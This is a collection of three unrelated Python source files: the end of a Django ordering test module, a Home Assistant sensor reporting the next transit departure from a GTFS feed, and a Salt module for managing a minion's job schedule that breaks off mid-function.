"Article 3",
"Article 2",
"Article 1",
],
attrgetter("headline")
)
def test_order_by_f_expression(self):
self.assertQuerysetEqual(
Article.objects.order_by(F('headline')), [
"Article 1",
"Article 2",
"Article 3",
"Article 4",
],
attrgetter("headline")
)
self.assertQuerysetEqual(
Article.objects.order_by(F('headline').asc()), [
"Article 1",
"Article 2",
"Article 3",
"Article 4",
],
attrgetter("headline")
)
self.assertQuerysetEqual(
Article.objects.order_by(F('headline').desc()), [
"Article 4",
"Article 3",
"Article 2",
"Article 1",
],
attrgetter("headline")
)
def test_order_by_f_expression_duplicates(self):
"""
A column may only be included once (the first occurrence) so we check
to ensure there are no duplicates by inspecting the SQL.
"""
qs = Article.objects.order_by(F('headline').asc(), F('headline').desc())
sql = str(qs.query).upper()
fragment = sql[sql.find('ORDER BY'):]
self.assertEqual(fragment.count('HEADLINE'), 1)
self.assertQuerysetEqual(
qs, [
"Article 1",
"Article 2",
"Article 3",
"Article 4",
],
attrgetter("headline")
)
qs = Article.objects.order_by(F('headline').desc(), F('headline').asc())
sql = str(qs.query).upper()
fragment = sql[sql.find('ORDER BY'):]
self.assertEqual(fragment.count('HEADLINE'), 1)
self.assertQuerysetEqual(
qs, [
"Article 4",
"Article 3",
"Article 2",
"Article 1",
],
attrgetter("headline")
)
def test_related_ordering_duplicate_table_reference(self):
"""
        An ordering that references a model whose own ordering references
        the same model multiple times should not be flagged as a circular
        reference (#24654).
"""
first_author = Author.objects.create()
second_author = Author.objects.create()
self.a1.author = first_author
self.a1.second_author = second_author
self.a1.save()
self.a2.author = second_author
self.a2.second_author = first_author
self.a2.save()
r1 = Reference.objects.create(article_id=self.a1.pk)
r2 = Reference.objects.create(article_id=self.a2.pk)
self.assertSequenceEqual(Reference.objects.all(), [r2, r1])
|
|
"""Support for GTFS (Google/General Transport Format Schema)."""
import datetime
import logging
import os
import threading
from typing import Any, Callable, Optional
import voluptuous as vol
from homeassistant.components.sensor import PLATFORM_SCHEMA
from homeassistant.const import (
ATTR_ATTRIBUTION, CONF_NAME, CONF_OFFSET, DEVICE_CLASS_TIMESTAMP,
STATE_UNKNOWN)
import homeassistant.helpers.config_validation as cv
from homeassistant.helpers.entity import Entity
from homeassistant.helpers.typing import ConfigType, HomeAssistantType
from homeassistant.util import slugify
import homeassistant.util.dt as dt_util
_LOGGER = logging.getLogger(__name__)
ATTR_ARRIVAL = 'arrival'
ATTR_BICYCLE = 'trip_bikes_allowed_state'
ATTR_DAY = 'day'
ATTR_FIRST = 'first'
ATTR_DROP_OFF_DESTINATION = 'destination_stop_drop_off_type_state'
ATTR_DROP_OFF_ORIGIN = 'origin_stop_drop_off_type_state'
ATTR_INFO = 'info'
ATTR_OFFSET = CONF_OFFSET
ATTR_LAST = 'last'
ATTR_LOCATION_DESTINATION = 'destination_station_location_type_name'
ATTR_LOCATION_ORIGIN = 'origin_station_location_type_name'
ATTR_PICKUP_DESTINATION = 'destination_stop_pickup_type_state'
ATTR_PICKUP_ORIGIN = 'origin_stop_pickup_type_state'
ATTR_ROUTE_TYPE = 'route_type_name'
ATTR_TIMEPOINT_DESTINATION = 'destination_stop_timepoint_exact'
ATTR_TIMEPOINT_ORIGIN = 'origin_stop_timepoint_exact'
ATTR_WHEELCHAIR = 'trip_wheelchair_access_available'
ATTR_WHEELCHAIR_DESTINATION = \
'destination_station_wheelchair_boarding_available'
ATTR_WHEELCHAIR_ORIGIN = 'origin_station_wheelchair_boarding_available'
CONF_DATA = 'data'
CONF_DESTINATION = 'destination'
CONF_ORIGIN = 'origin'
CONF_TOMORROW = 'include_tomorrow'
DEFAULT_NAME = 'GTFS Sensor'
DEFAULT_PATH = 'gtfs'
BICYCLE_ALLOWED_DEFAULT = STATE_UNKNOWN
BICYCLE_ALLOWED_OPTIONS = {
1: True,
2: False,
}
DROP_OFF_TYPE_DEFAULT = STATE_UNKNOWN
DROP_OFF_TYPE_OPTIONS = {
0: 'Regular',
1: 'Not Available',
2: 'Call Agency',
3: 'Contact Driver',
}
ICON = 'mdi:train'
ICONS = {
0: 'mdi:tram',
1: 'mdi:subway',
2: 'mdi:train',
3: 'mdi:bus',
4: 'mdi:ferry',
5: 'mdi:train-variant',
6: 'mdi:gondola',
7: 'mdi:stairs',
}
LOCATION_TYPE_DEFAULT = 'Stop'
LOCATION_TYPE_OPTIONS = {
0: 'Station',
1: 'Stop',
2: "Station Entrance/Exit",
3: 'Other',
}
PICKUP_TYPE_DEFAULT = STATE_UNKNOWN
PICKUP_TYPE_OPTIONS = {
0: 'Regular',
1: "None Available",
2: "Call Agency",
3: "Contact Driver",
}
ROUTE_TYPE_OPTIONS = {
0: 'Tram',
1: 'Subway',
2: 'Rail',
3: 'Bus',
4: 'Ferry',
5: "Cable Tram",
6: "Aerial Lift",
7: 'Funicular',
}
TIMEPOINT_DEFAULT = True
TIMEPOINT_OPTIONS = {
0: False,
1: True,
}
WHEELCHAIR_ACCESS_DEFAULT = STATE_UNKNOWN
WHEELCHAIR_ACCESS_OPTIONS = {
1: True,
2: False,
}
WHEELCHAIR_BOARDING_DEFAULT = STATE_UNKNOWN
WHEELCHAIR_BOARDING_OPTIONS = {
1: True,
2: False,
}
PLATFORM_SCHEMA = PLATFORM_SCHEMA.extend({ # type: ignore
vol.Required(CONF_ORIGIN): cv.string,
vol.Required(CONF_DESTINATION): cv.string,
vol.Required(CONF_DATA): cv.string,
vol.Optional(CONF_NAME): cv.string,
vol.Optional(CONF_OFFSET, default=0): cv.time_period,
vol.Optional(CONF_TOMORROW, default=False): cv.boolean,
})
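# A minimal configuration.yaml entry for this platform might look like the
# following sketch (the stop IDs and feed filename are placeholders; the feed
# file is expected under the 'gtfs' directory of the configuration path):
#
#   sensor:
#     - platform: gtfs
#       origin: STOP_ID_ORIGIN
#       destination: STOP_ID_DESTINATION
#       data: example_feed.zip
#       include_tomorrow: true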
def get_next_departure(schedule: Any, start_station_id: Any,
end_station_id: Any, offset: cv.time_period,
include_tomorrow: bool = False) -> dict:
"""Get the next departure for the given schedule."""
now = datetime.datetime.now() + offset
now_date = now.strftime(dt_util.DATE_STR_FORMAT)
yesterday = now - datetime.timedelta(days=1)
yesterday_date = yesterday.strftime(dt_util.DATE_STR_FORMAT)
tomorrow = now + datetime.timedelta(days=1)
tomorrow_date = tomorrow.strftime(dt_util.DATE_STR_FORMAT)
from sqlalchemy.sql import text
# Fetch all departures for yesterday, today and optionally tomorrow,
# up to an overkill maximum in case of a departure every minute for those
# days.
limit = 24 * 60 * 60 * 2
tomorrow_select = tomorrow_where = tomorrow_order = ''
if include_tomorrow:
limit = int(limit / 2 * 3)
tomorrow_name = tomorrow.strftime('%A').lower()
tomorrow_select = "calendar.{} AS tomorrow,".format(tomorrow_name)
tomorrow_where = "OR calendar.{} = 1".format(tomorrow_name)
tomorrow_order = "calendar.{} DESC,".format(tomorrow_name)
sql_query = """
SELECT trip.trip_id, trip.route_id,
time(origin_stop_time.arrival_time) AS origin_arrival_time,
time(origin_stop_time.departure_time) AS origin_depart_time,
date(origin_stop_time.departure_time) AS origin_depart_date,
origin_stop_time.drop_off_type AS origin_drop_off_type,
origin_stop_time.pickup_type AS origin_pickup_type,
origin_stop_time.shape_dist_traveled AS origin_dist_traveled,
origin_stop_time.stop_headsign AS origin_stop_headsign,
origin_stop_time.stop_sequence AS origin_stop_sequence,
origin_stop_time.timepoint AS origin_stop_timepoint,
time(destination_stop_time.arrival_time) AS dest_arrival_time,
time(destination_stop_time.departure_time) AS dest_depart_time,
destination_stop_time.drop_off_type AS dest_drop_off_type,
destination_stop_time.pickup_type AS dest_pickup_type,
destination_stop_time.shape_dist_traveled AS dest_dist_traveled,
destination_stop_time.stop_headsign AS dest_stop_headsign,
destination_stop_time.stop_sequence AS dest_stop_sequence,
destination_stop_time.timepoint AS dest_stop_timepoint,
calendar.{yesterday_name} AS yesterday,
calendar.{today_name} AS today,
{tomorrow_select}
calendar.start_date AS start_date,
calendar.end_date AS end_date
FROM trips trip
INNER JOIN calendar calendar
ON trip.service_id = calendar.service_id
INNER JOIN stop_times origin_stop_time
ON trip.trip_id = origin_stop_time.trip_id
INNER JOIN stops start_station
ON origin_stop_time.stop_id = start_station.stop_id
INNER JOIN stop_times destination_stop_time
ON trip.trip_id = destination_stop_time.trip_id
INNER JOIN stops end_station
ON destination_stop_time.stop_id = end_station.stop_id
WHERE (calendar.{yesterday_name} = 1
OR calendar.{today_name} = 1
{tomorrow_where}
)
AND start_station.stop_id = :origin_station_id
AND end_station.stop_id = :end_station_id
AND origin_stop_sequence < dest_stop_sequence
AND calendar.start_date <= :today
AND calendar.end_date >= :today
ORDER BY calendar.{yesterday_name} DESC,
calendar.{today_name} DESC,
{tomorrow_order}
origin_stop_time.departure_time
LIMIT :limit
""".format(yesterday_name=yesterday.strftime('%A').lower(),
today_name=now.strftime('%A').lower(),
tomorrow_select=tomorrow_select,
tomorrow_where=tomorrow_where,
tomorrow_order=tomorrow_order)
result = schedule.engine.execute(text(sql_query),
origin_station_id=start_station_id,
end_station_id=end_station_id,
today=now_date,
limit=limit)
# Create lookup timetable for today and possibly tomorrow, taking into
# account any departures from yesterday scheduled after midnight,
# as long as all departures are within the calendar date range.
timetable = {}
yesterday_start = today_start = tomorrow_start = None
yesterday_last = today_last = ''
for row in result:
if row['yesterday'] == 1 and yesterday_date >= row['start_date']:
extras = {
'day': 'yesterday',
'first': None,
'last': False,
}
if yesterday_start is None:
yesterday_start = row['origin_depart_date']
if yesterday_start != row['origin_depart_date']:
idx = '{} {}'.format(now_date,
row['origin_depart_time'])
timetable[idx] = {**row, **extras}
yesterday_last = idx
if row['today'] == 1:
extras = {
'day': 'today',
'first': False,
'last': False,
}
if today_start is None:
today_start = row['origin_depart_date']
extras['first'] = True
if today_start == row['origin_depart_date']:
idx_prefix = now_date
else:
idx_prefix = tomorrow_date
idx = '{} {}'.format(idx_prefix, row['origin_depart_time'])
timetable[idx] = {**row, **extras}
today_last = idx
if 'tomorrow' in row and row['tomorrow'] == 1 and tomorrow_date <= \
row['end_date']:
extras = {
'day': 'tomorrow',
'first': False,
'last': None,
}
if tomorrow_start is None:
tomorrow_start = row['origin_depart_date']
extras['first'] = True
if tomorrow_start == row['origin_depart_date']:
idx = '{} {}'.format(tomorrow_date,
row['origin_depart_time'])
timetable[idx] = {**row, **extras}
# Flag last departures.
for idx in filter(None, [yesterday_last, today_last]):
timetable[idx]['last'] = True
_LOGGER.debug("Timetable: %s", sorted(timetable.keys()))
item = {} # type: dict
for key in sorted(timetable.keys()):
if dt_util.parse_datetime(key) > now:
item = timetable[key]
_LOGGER.debug("Departure found for station %s @ %s -> %s",
start_station_id, key, item)
break
if item == {}:
return {}
# Format arrival and departure dates and times, accounting for the
# possibility of times crossing over midnight.
origin_arrival = now
if item['origin_arrival_time'] > item['origin_depart_time']:
origin_arrival -= datetime.timedelta(days=1)
origin_arrival_time = '{} {}'.format(
origin_arrival.strftime(dt_util.DATE_STR_FORMAT),
item['origin_arrival_time'])
origin_depart_time = '{} {}'.format(now_date, item['origin_depart_time'])
dest_arrival = now
if item['dest_arrival_time'] < item['origin_depart_time']:
dest_arrival += datetime.timedelta(days=1)
dest_arrival_time = '{} {}'.format(
dest_arrival.strftime(dt_util.DATE_STR_FORMAT),
item['dest_arrival_time'])
dest_depart = dest_arrival
if item['dest_depart_time'] < item['dest_arrival_time']:
dest_depart += datetime.timedelta(days=1)
dest_depart_time = '{} {}'.format(
dest_depart.strftime(dt_util.DATE_STR_FORMAT),
item['dest_depart_time'])
depart_time = dt_util.parse_datetime(origin_depart_time)
arrival_time = dt_util.parse_datetime(dest_arrival_time)
origin_stop_time = {
'Arrival Time': origin_arrival_time,
'Departure Time': origin_depart_time,
'Drop Off Type': item['origin_drop_off_type'],
'Pickup Type': item['origin_pickup_type'],
'Shape Dist Traveled': item['origin_dist_traveled'],
'Headsign': item['origin_stop_headsign'],
'Sequence': item['origin_stop_sequence'],
'Timepoint': item['origin_stop_timepoint'],
}
destination_stop_time = {
'Arrival Time': dest_arrival_time,
'Departure Time': dest_depart_time,
'Drop Off Type': item['dest_drop_off_type'],
'Pickup Type': item['dest_pickup_type'],
'Shape Dist Traveled': item['dest_dist_traveled'],
'Headsign': item['dest_stop_headsign'],
'Sequence': item['dest_stop_sequence'],
'Timepoint': item['dest_stop_timepoint'],
}
return {
'trip_id': item['trip_id'],
'route_id': item['route_id'],
'day': item['day'],
'first': item['first'],
'last': item['last'],
'departure_time': depart_time,
'arrival_time': arrival_time,
'origin_stop_time': origin_stop_time,
'destination_stop_time': destination_stop_time,
}
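# For reference, a successful lookup returns a dict shaped roughly like this
# (the values below are illustrative only):
#
#   {'trip_id': '1234', 'route_id': '10', 'day': 'today', 'first': True,
#    'last': False, 'departure_time': <datetime>, 'arrival_time': <datetime>,
#    'origin_stop_time': {...}, 'destination_stop_time': {...}}
#
# An empty dict is returned when no further departure could be found.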
def setup_platform(hass: HomeAssistantType, config: ConfigType,
add_entities: Callable[[list], None],
discovery_info: Optional[dict] = None) -> None:
"""Set up the GTFS sensor."""
gtfs_dir = hass.config.path(DEFAULT_PATH)
data = config[CONF_DATA]
origin = config.get(CONF_ORIGIN)
destination = config.get(CONF_DESTINATION)
name = config.get(CONF_NAME)
offset = config.get(CONF_OFFSET)
include_tomorrow = config[CONF_TOMORROW]
if not os.path.exists(gtfs_dir):
os.makedirs(gtfs_dir)
if not os.path.exists(os.path.join(gtfs_dir, data)):
_LOGGER.error("The given GTFS data file/folder was not found")
return
import pygtfs
(gtfs_root, _) = os.path.splitext(data)
sqlite_file = "{}.sqlite?check_same_thread=False".format(gtfs_root)
joined_path = os.path.join(gtfs_dir, sqlite_file)
gtfs = pygtfs.Schedule(joined_path)
# pylint: disable=no-member
if not gtfs.feeds:
pygtfs.append_feed(gtfs, os.path.join(gtfs_dir, data))
add_entities([
GTFSDepartureSensor(gtfs, name, origin, destination, offset,
include_tomorrow)])
class GTFSDepartureSensor(Entity):
"""Implementation of a GTFS departure sensor."""
def __init__(self, pygtfs: Any, name: Optional[Any], origin: Any,
destination: Any, offset: cv.time_period,
include_tomorrow: bool) -> None:
"""Initialize the sensor."""
self._pygtfs = pygtfs
self.origin = origin
self.destination = destination
self._include_tomorrow = include_tomorrow
self._offset = offset
self._custom_name = name
self._available = False
self._icon = ICON
self._name = ''
self._state = None # type: Optional[str]
self._attributes = {} # type: dict
self._agency = None
self._departure = {} # type: dict
self._destination = None
self._origin = None
self._route = None
self._trip = None
self.lock = threading.Lock()
self.update()
@property
def name(self) -> str:
"""Return the name of the sensor."""
return self._name
@property
def state(self) -> Optional[str]: # type: ignore
"""Return the state of the sensor."""
return self._state
@property
def available(self) -> bool:
"""Return True if entity is available."""
return self._available
@property
def device_state_attributes(self) -> dict:
"""Return the state attributes."""
return self._attributes
@property
def icon(self) -> str:
"""Icon to use in the frontend, if any."""
return self._icon
@property
def device_class(self) -> str:
"""Return the class of this device."""
return DEVICE_CLASS_TIMESTAMP
def update(self) -> None:
"""Get the latest data from GTFS and update the states."""
with self.lock:
# Fetch valid stop information once
if not self._origin:
stops = self._pygtfs.stops_by_id(self.origin)
if not stops:
self._available = False
_LOGGER.warning("Origin stop ID %s not found", self.origin)
return
self._origin = stops[0]
if not self._destination:
stops = self._pygtfs.stops_by_id(self.destination)
if not stops:
self._available = False
_LOGGER.warning("Destination stop ID %s not found",
self.destination)
return
self._destination = stops[0]
self._available = True
# Fetch next departure
self._departure = get_next_departure(
self._pygtfs, self.origin, self.destination, self._offset,
self._include_tomorrow)
# Define the state as a UTC timestamp with ISO 8601 format
if not self._departure:
self._state = None
else:
self._state = dt_util.as_utc(
self._departure['departure_time']).isoformat()
# Fetch trip and route details once, unless updated
if not self._departure:
self._trip = None
else:
trip_id = self._departure['trip_id']
if not self._trip or self._trip.trip_id != trip_id:
_LOGGER.debug("Fetching trip details for %s", trip_id)
self._trip = self._pygtfs.trips_by_id(trip_id)[0]
route_id = self._departure['route_id']
if not self._route or self._route.route_id != route_id:
_LOGGER.debug("Fetching route details for %s", route_id)
self._route = self._pygtfs.routes_by_id(route_id)[0]
# Fetch agency details exactly once
if self._agency is None and self._route:
_LOGGER.debug("Fetching agency details for %s",
self._route.agency_id)
try:
self._agency = self._pygtfs.agencies_by_id(
self._route.agency_id)[0]
except IndexError:
_LOGGER.warning(
"Agency ID '%s' was not found in agency table, "
"you may want to update the routes database table "
"to fix this missing reference",
self._route.agency_id)
self._agency = False
# Assign attributes, icon and name
self.update_attributes()
if self._route:
self._icon = ICONS.get(self._route.route_type, ICON)
else:
self._icon = ICON
name = '{agency} {origin} to {destination} next departure'
if not self._departure:
name = '{default}'
self._name = (self._custom_name or
name.format(agency=getattr(self._agency,
'agency_name',
DEFAULT_NAME),
default=DEFAULT_NAME,
origin=self.origin,
destination=self.destination))
def update_attributes(self) -> None:
"""Update state attributes."""
# Add departure information
if self._departure:
self._attributes[ATTR_ARRIVAL] = dt_util.as_utc(
self._departure['arrival_time']).isoformat()
self._attributes[ATTR_DAY] = self._departure['day']
if self._departure[ATTR_FIRST] is not None:
self._attributes[ATTR_FIRST] = self._departure['first']
elif ATTR_FIRST in self._attributes:
del self._attributes[ATTR_FIRST]
if self._departure[ATTR_LAST] is not None:
self._attributes[ATTR_LAST] = self._departure['last']
elif ATTR_LAST in self._attributes:
del self._attributes[ATTR_LAST]
else:
if ATTR_ARRIVAL in self._attributes:
del self._attributes[ATTR_ARRIVAL]
if ATTR_DAY in self._attributes:
del self._attributes[ATTR_DAY]
if ATTR_FIRST in self._attributes:
del self._attributes[ATTR_FIRST]
if ATTR_LAST in self._attributes:
del self._attributes[ATTR_LAST]
# Add contextual information
self._attributes[ATTR_OFFSET] = self._offset.seconds / 60
if self._state is None:
self._attributes[ATTR_INFO] = "No more departures" if \
self._include_tomorrow else "No more departures today"
elif ATTR_INFO in self._attributes:
del self._attributes[ATTR_INFO]
if self._agency:
self._attributes[ATTR_ATTRIBUTION] = self._agency.agency_name
elif ATTR_ATTRIBUTION in self._attributes:
del self._attributes[ATTR_ATTRIBUTION]
# Add extra metadata
key = 'agency_id'
if self._agency and key not in self._attributes:
self.append_keys(self.dict_for_table(self._agency), 'Agency')
key = 'origin_station_stop_id'
if self._origin and key not in self._attributes:
self.append_keys(self.dict_for_table(self._origin),
"Origin Station")
self._attributes[ATTR_LOCATION_ORIGIN] = \
LOCATION_TYPE_OPTIONS.get(
self._origin.location_type,
LOCATION_TYPE_DEFAULT)
self._attributes[ATTR_WHEELCHAIR_ORIGIN] = \
WHEELCHAIR_BOARDING_OPTIONS.get(
self._origin.wheelchair_boarding,
WHEELCHAIR_BOARDING_DEFAULT)
key = 'destination_station_stop_id'
if self._destination and key not in self._attributes:
self.append_keys(self.dict_for_table(self._destination),
"Destination Station")
self._attributes[ATTR_LOCATION_DESTINATION] = \
LOCATION_TYPE_OPTIONS.get(
self._destination.location_type,
LOCATION_TYPE_DEFAULT)
self._attributes[ATTR_WHEELCHAIR_DESTINATION] = \
WHEELCHAIR_BOARDING_OPTIONS.get(
self._destination.wheelchair_boarding,
WHEELCHAIR_BOARDING_DEFAULT)
# Manage Route metadata
key = 'route_id'
if not self._route and key in self._attributes:
self.remove_keys('Route')
elif self._route and (key not in self._attributes or
self._attributes[key] != self._route.route_id):
self.append_keys(self.dict_for_table(self._route), 'Route')
self._attributes[ATTR_ROUTE_TYPE] = \
ROUTE_TYPE_OPTIONS[self._route.route_type]
# Manage Trip metadata
key = 'trip_id'
if not self._trip and key in self._attributes:
self.remove_keys('Trip')
elif self._trip and (key not in self._attributes or
self._attributes[key] != self._trip.trip_id):
self.append_keys(self.dict_for_table(self._trip), 'Trip')
self._attributes[ATTR_BICYCLE] = BICYCLE_ALLOWED_OPTIONS.get(
self._trip.bikes_allowed,
BICYCLE_ALLOWED_DEFAULT)
self._attributes[ATTR_WHEELCHAIR] = WHEELCHAIR_ACCESS_OPTIONS.get(
self._trip.wheelchair_accessible,
WHEELCHAIR_ACCESS_DEFAULT)
# Manage Stop Times metadata
prefix = 'origin_stop'
if self._departure:
self.append_keys(self._departure['origin_stop_time'], prefix)
self._attributes[ATTR_DROP_OFF_ORIGIN] = DROP_OFF_TYPE_OPTIONS.get(
self._departure['origin_stop_time']['Drop Off Type'],
DROP_OFF_TYPE_DEFAULT)
self._attributes[ATTR_PICKUP_ORIGIN] = PICKUP_TYPE_OPTIONS.get(
self._departure['origin_stop_time']['Pickup Type'],
PICKUP_TYPE_DEFAULT)
self._attributes[ATTR_TIMEPOINT_ORIGIN] = TIMEPOINT_OPTIONS.get(
self._departure['origin_stop_time']['Timepoint'],
TIMEPOINT_DEFAULT)
else:
self.remove_keys(prefix)
prefix = 'destination_stop'
if self._departure:
self.append_keys(self._departure['destination_stop_time'], prefix)
self._attributes[ATTR_DROP_OFF_DESTINATION] = \
DROP_OFF_TYPE_OPTIONS.get(
self._departure['destination_stop_time']['Drop Off Type'],
DROP_OFF_TYPE_DEFAULT)
self._attributes[ATTR_PICKUP_DESTINATION] = \
PICKUP_TYPE_OPTIONS.get(
self._departure['destination_stop_time']['Pickup Type'],
PICKUP_TYPE_DEFAULT)
self._attributes[ATTR_TIMEPOINT_DESTINATION] = \
TIMEPOINT_OPTIONS.get(
self._departure['destination_stop_time']['Timepoint'],
TIMEPOINT_DEFAULT)
else:
self.remove_keys(prefix)
@staticmethod
def dict_for_table(resource: Any) -> dict:
"""Return a dictionary for the SQLAlchemy resource given."""
return dict((col, getattr(resource, col))
for col in resource.__table__.columns.keys())
def append_keys(self, resource: dict, prefix: Optional[str] = None) -> \
None:
"""Properly format key val pairs to append to attributes."""
for attr, val in resource.items():
if val == '' or val is None or attr == 'feed_id':
continue
key = attr
if prefix and not key.startswith(prefix):
key = '{} {}'.format(prefix, key)
key = slugify(key)
self._attributes[key] = val
def remove_keys(self, prefix: str) -> None:
"""Remove attributes whose key starts with prefix."""
self._attributes = {k: v for k, v in self._attributes.items() if
not k.startswith(prefix)}
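# Illustrative sketch (hypothetical values): append_keys() prefixes and
# slugifies incoming keys before storing them, and remove_keys() drops every
# attribute whose key starts with the given prefix, so the calls below would
# round-trip cleanly:
#
#     sensor.append_keys({'stop_id': 'S1', 'stop_name': 'Central'},
#                        'Origin Station')
#     # _attributes now holds 'origin_station_stop_id' and
#     # 'origin_station_stop_name'
#     sensor.remove_keys('origin_station')
#     # both keys are removed again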
|
|
# -*- coding: utf-8 -*-
'''
Module for managing the Salt schedule on a minion
.. versionadded:: 2014.7.0
'''
# Import Python libs
from __future__ import absolute_import
import copy as pycopy
import difflib
import os
import yaml
# Import salt libs
import salt.utils
import salt.utils.odict
# Import 3rd-party libs
import salt.ext.six as six
__proxyenabled__ = ['*']
import logging
log = logging.getLogger(__name__)
__func_alias__ = {
'list_': 'list',
'reload_': 'reload'
}
SCHEDULE_CONF = [
'name',
'maxrunning',
'function',
'splay',
'range',
'when',
'once',
'once_fmt',
'returner',
'jid_include',
'args',
'kwargs',
'_seconds',
'seconds',
'minutes',
'hours',
'days',
'enabled',
'return_job',
'metadata',
'cron',
'until',
'after',
'return_config',
'return_kwargs'
]
def list_(show_all=False,
show_disabled=True,
where=None,
return_yaml=True):
'''
List the jobs currently scheduled on the minion
CLI Example:
.. code-block:: bash
salt '*' schedule.list
# Show all jobs including hidden internal jobs
salt '*' schedule.list show_all=True
# Hide disabled jobs from list of jobs
salt '*' schedule.list show_disabled=False
'''
schedule = {}
try:
eventer = salt.utils.event.get_event('minion', opts=__opts__)
res = __salt__['event.fire']({'func': 'list',
'where': where}, 'manage_schedule')
if res:
event_ret = eventer.get_event(tag='/salt/minion/minion_schedule_list_complete', wait=30)
if event_ret and event_ret['complete']:
schedule = event_ret['schedule']
except KeyError:
# Effectively a no-op, since we can't really return without an event system
ret = {}
ret['comment'] = 'Event module not available. Schedule list failed.'
ret['result'] = True
log.debug('Event module not available. Schedule list failed.')
return ret
for job in list(schedule.keys()): # iterate over a copy since we will mutate it
if job == 'enabled':
continue
# Default jobs added by salt begin with __
# by default hide them unless show_all is True.
if job.startswith('__') and not show_all:
del schedule[job]
continue
# if enabled is not included in the job,
# assume job is enabled.
if 'enabled' not in schedule[job]:
schedule[job]['enabled'] = True
for item in pycopy.copy(schedule[job]):
if item not in SCHEDULE_CONF:
del schedule[job][item]
continue
if schedule[job][item] == 'true':
schedule[job][item] = True
if schedule[job][item] == 'false':
schedule[job][item] = False
# if the job is disabled and show_disabled is False, skip job
if not show_disabled and not schedule[job]['enabled']:
del schedule[job]
continue
if '_seconds' in schedule[job]:
            # if _seconds is greater than zero, expose the original value
            # back as 'seconds'; otherwise remove 'seconds' from the
            # listing, since the original item didn't include it.
if schedule[job]['_seconds'] > 0:
schedule[job]['seconds'] = schedule[job]['_seconds']
elif 'seconds' in schedule[job]:
del schedule[job]['seconds']
# remove _seconds from the listing
del schedule[job]['_seconds']
if schedule:
if return_yaml:
tmp = {'schedule': schedule}
yaml_out = yaml.safe_dump(tmp, default_flow_style=False)
return yaml_out
else:
return schedule
else:
return {'schedule': {}}
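# Illustrative output shape (hypothetical job): with return_yaml=True the
# schedule is rendered with yaml.safe_dump, so a single job comes back
# roughly as:
#
#   schedule:
#     job1:
#       enabled: true
#       function: test.ping
#       jid_include: true
#       maxrunning: 1
#       name: job1
#       seconds: 3600
#
# With return_yaml=False the same data is returned as a plain dict, which is
# what the other functions in this module rely on.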
def is_enabled(name):
'''
    List a job only if it's enabled
.. versionadded:: 2015.5.3
CLI Example:
.. code-block:: bash
salt '*' schedule.is_enabled name=job_name
'''
current_schedule = __salt__['schedule.list'](show_all=False, return_yaml=False)
if name in current_schedule:
return current_schedule[name]
else:
return {}
def purge(**kwargs):
'''
Purge all the jobs currently scheduled on the minion
CLI Example:
.. code-block:: bash
salt '*' schedule.purge
'''
ret = {'comment': [],
'result': True}
for name in list_(show_all=True, return_yaml=False):
if name == 'enabled':
continue
if name.startswith('__'):
continue
if 'test' in kwargs and kwargs['test']:
ret['result'] = True
ret['comment'].append('Job: {0} would be deleted from schedule.'.format(name))
else:
persist = True
if 'persist' in kwargs:
persist = kwargs['persist']
try:
eventer = salt.utils.event.get_event('minion', opts=__opts__)
res = __salt__['event.fire']({'name': name,
'func': 'delete',
'persist': persist}, 'manage_schedule')
if res:
event_ret = eventer.get_event(tag='/salt/minion/minion_schedule_delete_complete', wait=30)
if event_ret and event_ret['complete']:
_schedule_ret = event_ret['schedule']
if name not in _schedule_ret:
ret['result'] = True
ret['comment'].append('Deleted job: {0} from schedule.'.format(name))
else:
ret['comment'].append('Failed to delete job {0} from schedule.'.format(name))
                            ret['result'] = False
return ret
except KeyError:
# Effectively a no-op, since we can't really return without an event system
                ret['comment'] = 'Event module not available. Schedule purge failed.'
ret['result'] = True
return ret
def delete(name, **kwargs):
'''
Delete a job from the minion's schedule
CLI Example:
.. code-block:: bash
salt '*' schedule.delete job1
'''
ret = {'comment': 'Failed to delete job {0} from schedule.'.format(name),
'result': False}
    if not name:
        ret['comment'] = 'Job name is required.'
        return ret
if 'test' in kwargs and kwargs['test']:
ret['comment'] = 'Job: {0} would be deleted from schedule.'.format(name)
ret['result'] = True
else:
persist = True
if 'persist' in kwargs:
persist = kwargs['persist']
if name in list_(show_all=True, where='opts', return_yaml=False):
event_data = {'name': name, 'func': 'delete', 'persist': persist}
elif name in list_(show_all=True, where='pillar', return_yaml=False):
event_data = {'name': name, 'where': 'pillar', 'func': 'delete', 'persist': False}
else:
ret['comment'] = 'Job {0} does not exist.'.format(name)
return ret
try:
eventer = salt.utils.event.get_event('minion', opts=__opts__)
res = __salt__['event.fire'](event_data, 'manage_schedule')
if res:
event_ret = eventer.get_event(tag='/salt/minion/minion_schedule_delete_complete', wait=30)
if event_ret and event_ret['complete']:
schedule = event_ret['schedule']
if name not in schedule:
ret['result'] = True
ret['comment'] = 'Deleted Job {0} from schedule.'.format(name)
else:
ret['comment'] = 'Failed to delete job {0} from schedule.'.format(name)
return ret
except KeyError:
# Effectively a no-op, since we can't really return without an event system
            ret['comment'] = 'Event module not available. Schedule delete failed.'
return ret
def build_schedule_item(name, **kwargs):
'''
Build a schedule job
CLI Example:
.. code-block:: bash
salt '*' schedule.build_schedule_item job1 function='test.ping' seconds=3600
'''
ret = {'comment': [],
'result': True}
if not name:
ret['comment'] = 'Job name is required.'
ret['result'] = False
return ret
schedule = {}
schedule[name] = salt.utils.odict.OrderedDict()
schedule[name]['function'] = kwargs['function']
time_conflict = False
for item in ['seconds', 'minutes', 'hours', 'days']:
if item in kwargs and 'when' in kwargs:
time_conflict = True
if item in kwargs and 'cron' in kwargs:
time_conflict = True
if time_conflict:
ret['result'] = False
ret['comment'] = 'Unable to use "seconds", "minutes", "hours", or "days" with "when" or "cron" options.'
return ret
if 'when' in kwargs and 'cron' in kwargs:
ret['result'] = False
ret['comment'] = 'Unable to use "when" and "cron" options together. Ignoring.'
return ret
for item in ['seconds', 'minutes', 'hours', 'days']:
if item in kwargs:
schedule[name][item] = kwargs[item]
if 'return_job' in kwargs:
schedule[name]['return_job'] = kwargs['return_job']
if 'metadata' in kwargs:
schedule[name]['metadata'] = kwargs['metadata']
if 'job_args' in kwargs:
schedule[name]['args'] = kwargs['job_args']
if 'job_kwargs' in kwargs:
schedule[name]['kwargs'] = kwargs['job_kwargs']
if 'maxrunning' in kwargs:
schedule[name]['maxrunning'] = kwargs['maxrunning']
else:
schedule[name]['maxrunning'] = 1
if 'name' in kwargs:
schedule[name]['name'] = kwargs['name']
else:
schedule[name]['name'] = name
if 'enabled' in kwargs:
schedule[name]['enabled'] = kwargs['enabled']
else:
schedule[name]['enabled'] = True
if 'jid_include' not in kwargs or kwargs['jid_include']:
schedule[name]['jid_include'] = True
if 'splay' in kwargs:
